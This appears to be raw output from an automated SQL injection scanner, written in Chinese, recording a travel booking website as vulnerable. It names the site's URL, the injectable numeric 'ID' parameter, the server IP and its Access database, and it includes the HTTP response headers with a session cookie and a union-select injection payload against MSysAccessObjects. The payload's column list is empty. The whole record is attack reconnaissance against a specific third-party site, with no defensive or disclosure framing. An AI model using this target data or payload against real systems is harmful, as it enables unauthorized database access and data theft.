■漏洞信息:============================================================
 ・URL:http://www.easitalytours.com/italytrip.asp?ID=1
 ・页面标题：BOOK MULTIPLE TOURS WITH US AND GET OUR SPECIAL DISCOUNTS!
 ・参数:ID=1
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:204.12.104.224
 ・数据库:Access
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 16:43:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34785
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCBDTBAS=JBIJPKAAPPIFJFFHIOBAGMAJ; path=/
Cache-control: private


联合查询列数: 总共= 0  显示的列= 0
联合查询SQL: and 3=8 union select  from MSysAccessObjects
